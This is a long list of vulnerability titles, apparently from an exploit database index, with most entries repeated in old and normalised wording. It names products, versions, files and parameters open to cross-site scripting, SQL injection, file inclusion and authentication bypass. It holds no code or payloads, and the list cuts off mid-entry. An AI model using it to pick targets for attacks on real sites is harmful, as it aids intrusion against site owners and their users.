Injection Centreon - SQL Injection / Command Injection net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Inclusion net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting and SQL Injection PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting / SQL Injection BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross-Site Scripting Vulnerabilities BLOG:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS Modx CMS 2.2.14 - CSRF Bypass / Reflected XSS / Stored XSS BlogEngine.NET 1.6 - Directory Traversal and Information Disclosure BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Inclusion TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion Batavi 1.0 - Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities 1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection 1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection CosmoShop 10.05.00 - Multiple Cross-Site Scripting and SQL Injection CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting and SQL Injection Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection Online store php script Multiple Cross-Site Scripting and SQL Injection Online store php script Multiple Cross-Site Scripting / SQL Injection Ripe Website Manager 1.1 - Cross-Site Scripting and Multiple SQL Injection Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection Cetera eCommerce Multiple Cross-Site Scripting and SQL Injection Cetera eCommerce Multiple Cross-Site Scripting / SQL Injection osCSS 2.1 - Cross-Site Scripting and Multiple Local File Inclusion osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Inclusion Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion PhoenixCMS 1.7 - Local File Inclusion and SQL Injection PhoenixCMS 1.7 - Local File Inclusion / SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusion and SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection Nuke Evolution Xtreme 2.0 - Local File Inclusion and SQL Injection Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection Tine 2.0 - 'vbook.php' Cross Site Scripting LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting Tine 2.0 - 'vbook.php' Cross-Site Scripting LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross-Site Scripting E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross Site Scripting E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities BMC Dashboards 7.6.01 - Cross Site Scripting / Information Disclosure PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross-Site Scripting Vulnerabilities BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities encoder 0.4.10 - 'edit.php' Cross Site Scripting Ampache 3.5.4 - 'login.php' Cross Site Scripting encoder 0.4.10 - 'edit.php' Cross-Site Scripting Ampache 3.5.4 - 'login.php' Cross-Site Scripting Gelsheet 1.02 - 'index.php' Cross Site Scripting Gelsheet 1.02 - 'index.php' Cross-Site Scripting Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities Pandora 3.1 - Auth Bypass and Arbitrary File Upload Pandora 3.1 - Auth Bypass / Arbitrary File Upload Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities Calendarix 0.8.20080808 - Multiple Cross-Site Scripting and SQL Injection Argyle Social Multiple Cross Site Scripting Vulnerabilities Argyle Social - Multiple Cross-Site Scripting Vulnerabilities Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting DocMGR 1.1.2 - 'history.php' Cross Site Scripting openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting DocMGR 1.1.2 - 'history.php' Cross-Site Scripting openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting eFront 3.6.9 - 'submitScore.php' Cross Site Scripting PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities TWiki 5.0.1 - 'origurl' Parameter Cross Site Scripting eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities TWiki 5.0.1 - 'origurl' Parameter Cross-Site Scripting CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross Site Scripting Cisco Unified Operations Manager 8.5 Common Services Device Center Cross Site Scripting CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross-Site Scripting Cisco Unified Operations Manager 8.5 Common Services Device Center Cross-Site Scripting Room Juice 0.3.3 - 'display.php' Cross Site Scripting Room Juice 0.3.3 - 'display.php' Cross-Site Scripting LimeSurvey 1.85+ 'admin.php' Cross Site Scripting LimeSurvey 1.85+ 'admin.php' Cross-Site Scripting phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities Ajax Chat 1.0 - 'ajax-chat.php' Cross Site Scripting Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting Gadu-Gadu Instant Messenger 6.0 File Transfer Cross-Site Scripting Cotonti 0.9.2 Multiple SQL Injection Cotonti 0.9.2 - Multiple SQL Injection Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross Site Scripting Serendipity Freetag-plugin 3.21 - 'index.php' Cross Site Scripting Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection Nagios 3.2.3 - 'expand' Parameter Cross Site Scripting Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting vBulletin vBExperience 3 - 'sortorder' Parameter Cross Site Scripting vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross Site Scripting Multiple WordPress WooThemes - 'test.php' Cross Site Scripting Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities The Pacer Edition CMS 2.1 - 'email' Parameter Cross Site Scripting The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting vBTube 1.2.9 - 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities Immophp 1.1.1 Cross Site Scripting and SQL Injection Taha Portal 3.2 - 'sitemap.php' Cross Site Scripting Immophp 1.1.1 Cross-Site Scripting and SQL Injection Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross Site Scripting Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting ecommerceMajor - SQL Injection And Authentication bypass ecommerceMajor - SQL Injection / Authentication bypass Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities Mambo CMS 4.6.x Multiple Cross-Site Scripting Vulnerabilities Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities webERP 4.3.8 Multiple Script URI XSS webERP 4.3.8 - Multiple Script URI XSS PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities Paliz Portal Cross Site Scripting and Multiple SQL Injection Paliz Portal Cross-Site Scripting and Multiple SQL Injection Classified Script c-BrowseClassified URL Cross Site Scripting Classified Script c-BrowseClassified URL Cross-Site Scripting Prontus CMS 'page' Parameter Cross Site Scripting Prontus CMS 'page' Parameter Cross-Site Scripting Alice Modem 1111 - 'rulename' Parameter Cross Site Scripting / Denial of Service Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service Flowplayer 3.2.7 linkUrl' Parameter Cross Site Scripting TCExam 11.2.x Multiple Cross Site Scripting Vulnerabilities Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting TCExam 11.2.x Multiple Cross-Site Scripting Vulnerabilities Joomla! 'com_resman' Component Cross Site Scripting Joomla! 'com_resman' Component Cross-Site Scripting Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross Site Scripting Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities Joomla! 1.6.5 and Prior Multiple Cross-Site Scripting Vulnerabilities Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting Cyberoam UTM Multiple Cross-Site Scripting Vulnerabilities Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities Curverider Elgg 1.7.9 Multiple Cross Site Scripting Vulnerabilities Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities mt LinkDatenbank 'b' Parameter Cross Site Scripting BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting mt LinkDatenbank 'b' Parameter Cross-Site Scripting BESNI OKUL PORTAL 'sayfa.asp' Cross-Site Scripting HESK 2.2 Multiple Cross Site Scripting Vulnerabilities WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Community Server 2007/2008 - 'TagSelector.aspx' Cross Site Scripting Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross-Site Scripting Vulnerabilities u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities u5CMS 3.9.3 - Multiple Stored XSS / Reflected XSS Vulnerabilities Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities Search Network 2.0 - 'query' Parameter Cross Site Scripting OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities Softbiz Recipes Portal Script Multiple Cross-Site Scripting Vulnerabilities Search Network 2.0 - 'query' Parameter Cross-Site Scripting OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities phpWebSite 'page_id' Parameter Cross Site Scripting awiki 20100125 Multiple Local File Inclusion SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities phpWebSite 'page_id' Parameter Cross-Site Scripting awiki 20100125 - Multiple Local File Inclusion WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities Adobe ColdFusion - 'probe.cfm' Cross Site Scripting MantisBT 1.1.8 Cross Site Scripting and SQL Injection Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting MantisBT 1.1.8 Cross-Site Scripting and SQL Injection OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting Pandora FMS 3.x - 'index.php' Cross Site Scripting OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting Pandora FMS 3.x - 'index.php' Cross-Site Scripting Concrete 5.4.1 1 - 'rcID' Parameter Cross Site Scripting Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS WonderPlugin Audio Player 2.0 - Blind SQL Injection / XSS IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities Mambo CMS N-Skyrslur Cross Site Scripting Mambo CMS N-Skyrslur Cross-Site Scripting GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities GuppY CMS 5.0.9 & 5.00.10 - Multiple CSRF Vulnerabilities ACal 2.2.6 'calendar.php' Cross Site Scripting ACal 2.2.6 'calendar.php' Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Kisanji 'gr' Parameter Cross Site Scripting GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection Kisanji 'gr' Parameter Cross-Site Scripting GeoClassifieds Lite 2.0.x Multiple Cross-Site Scripting and SQL Injection Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross Site Scripting SkaDate 'blogs.php' Cross Site Scripting Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting SkaDate 'blogs.php' Cross-Site Scripting Pluck 4.7 Multiple Local File Inclusion and File Disclosure Vulnerabilities Pluck 4.7 - Multiple Local File Inclusion and File Disclosure Vulnerabilities Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting PunBB 1.3.5 Multiple Cross-Site Scripting Vulnerabilities PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross Site Scripting Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities Card sharj 1.0 Multiple SQL Injection Card sharj 1.0 - Multiple SQL Injection i-Gallery 3.4 - 'd' Parameter Cross Site Scripting Free Help Desk 1.1b Multiple Input Validation Vulnerabilities phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities OneCMS 2.6.4 Multiple SQL Injection Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities phpRS 2.8.1 - Multiple SQL Injection / Cross-Site Scripting OneCMS 2.6.4 - Multiple SQL Injection Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities AdaptCMS 2.0.1 - Cross Site Scripting / Information Disclosure Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross Site Scripting AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross Site Scripting WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross Site Scripting WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross Site Scripting WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross Site Scripting WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross Site Scripting WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross Site Scripting WordPress Web Minimalist Theme 1.1 - 'index.php' Cross Site Scripting WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross Site Scripting WordPress Morning Coffee Theme 3.5 - 'index.php' Cross Site Scripting WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross Site Scripting Traq 2.2 - Multiple SQL Injection / Cross-Site Scripting Joomla! 1.7.0 and Prior Multiple Cross-Site Scripting Vulnerabilities Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting WordPress Trending 0.1 - 'cpage' Parameter Cross-Site Scripting Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting Active CMS 1.2 - 'mod' Parameter Cross Site Scripting Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting Jaws 0.8.14 Multiple Remote File Inclusion Jaws 0.8.14 - Multiple Remote File Inclusion 6KBBS 8.0 build 20101201 - Cross Site Scripting / Information Disclosure 6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities PROMOTIC 8.1.3 Multiple Security Vulnerabilities Xenon 'id' Parameter Multiple SQL Injection asgbookphp 1.9 - 'index.php' Cross Site Scripting PROMOTIC 8.1.3 - Multiple Security Vulnerabilities Xenon - 'id' Parameter Multiple SQL Injection asgbookphp 1.9 - 'index.php' Cross-Site Scripting Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection WordPress Theme Photocrati 4.x.x - SQL Injection & XSS WordPress Theme Photocrati 4.x.x - SQL Injection / XSS Splunk 4.1.6 'segment' Parameter Cross Site Scripting Splunk 4.1.6 'segment' Parameter Cross-Site Scripting osCommerce - Remote File Upload and File Disclosure Tine 2.0 Multiple Cross Site Scripting Vulnerabilities osCommerce - Remote File Upload / File Disclosure Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities Alsbtain Bulletin 1.5/1.6 Multiple Local File Inclusion vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting Domain Shop 'index.php' Cross Site Scripting vBulletin 4.1.7 Multiple Remote File Inclusion Domain Shop 'index.php' Cross-Site Scripting vBulletin 4.1.7 - Multiple Remote File Inclusion Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities IBSng B1.34(T96) 'str' Parameter Cross Site Scripting eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities eFront 3.6.x Multiple Cross Site Scripting and SQL Injection Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities eFront 3.6.x Multiple Cross-Site Scripting and SQL Injection Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting CmyDocument Multiple Cross Site Scripting Vulnerabilities CmyDocument Multiple Cross-Site Scripting Vulnerabilities WordPress Bonus Theme 1.0 - 's' Parameter Cross Site Scripting WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting SmartJobBoard 'keywords' Parameter Cross Site Scripting SmartJobBoard 'keywords' Parameter Cross-Site Scripting XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities AShop - Open-Redirection / Cross Site Scripting Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities AShop - Open-Redirection / Cross-Site Scripting Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross-Site Scripting WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities WordPress Alert Before Your Post Plugin - 'name' Parameter Cross Site Scripting WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross Site Scripting WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross Site Scripting WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities Hastymail2 - 'rs' Parameter Cross Site Scripting Zen Cart CMS 1.3.9h Multiple Cross-Site Scripting Vulnerabilities Hastymail2 - 'rs' Parameter Cross-Site Scripting eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross-Site Scripting WordPress flash-album-gallery Plugin 'facebook.php' Cross-Site Scripting WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross-Site Scripting WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting Hero 3.69 - 'month' Parameter Cross Site Scripting Hero 3.69 - 'month' Parameter Cross-Site Scripting Siena CMS 1.242 - 'err' Parameter Cross Site Scripting WordPress WP Live.php 1.2.1 - 's' Parameter Cross Site Scripting PHPB2B 4.1 - 'q' Parameter Cross Site Scripting FuseTalk Forums 3.2 - 